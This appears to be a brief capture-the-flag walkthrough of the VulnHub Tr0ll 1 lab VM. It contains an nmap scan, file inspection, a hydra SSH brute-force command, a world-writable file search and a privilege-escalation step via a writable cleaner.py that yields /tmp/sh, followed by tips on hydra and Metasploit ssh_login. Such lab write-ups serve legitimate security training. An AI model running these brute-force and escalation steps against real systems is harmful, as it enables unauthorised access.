[Download]: http://vulnhub.com/entry/tr0ll-1,100/ |
offensive@security:~$ nmap -n -sV 192.168.108.0/24 Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-12 01:50 EDT Nmap scan report for 192.168.108.1 Host is up (0.0019s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Dynamode/Motorola WAP http config Service Info: Device: WAP Nmap scan report for 192.168.108.193 Host is up (0.00041s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 192.168.108.194 Host is up (0.0027s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh (protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port22-TCP:V=6.47%I=7%D=9/12%Time=54128998%P=x86_64-unknown-linux-gnu%r SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n"); Service Info: OS: Unix Nmap scan report for 192.168.108.197 Host is up (0.00026s latency). All 1000 scanned ports on 192.168.108.197 are closed Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 256 IP addresses (4 hosts up) scanned in 18.53 seconds |
ftp> open 192.168.108.194 |
offensive@security:~$ stringslol.pcap |
http://192.168.108.194/ |
offensive@security:~$ exiftoolroflmao |
offensive@security:~$ strings roflmao |
http://192.168.108.194/0x0856BF/ |
offensive@security:~$ cat which_one_lol.txt |
offensive@security:~$ hydra -F -V -Lwhich_one_lol.txt -p Pass.txt -S 192.168.108.194 ssh |
$ find / -type f -perm -0002 -print2>/dev/null | grep -v "/proc/" |
$ ls -l /lib/log/cleaner.py |
$ ls -l /tmp/ |
$ /tmp/sh |
Tips:
1. How to crack ssh/ftp ? (metasploit/hydra), Please Compare them.
Metasploit SSH crack
-- use auxiliary/scanner/ssh/ssh_login
Hydra: (Please write with a strict syntax, no left spaces)
-- hydra -F -V -L user.txt -P pass.txt 192.168.1.100 -S ssh
2. How to compile hydra by yourself,
3. Linux Privilege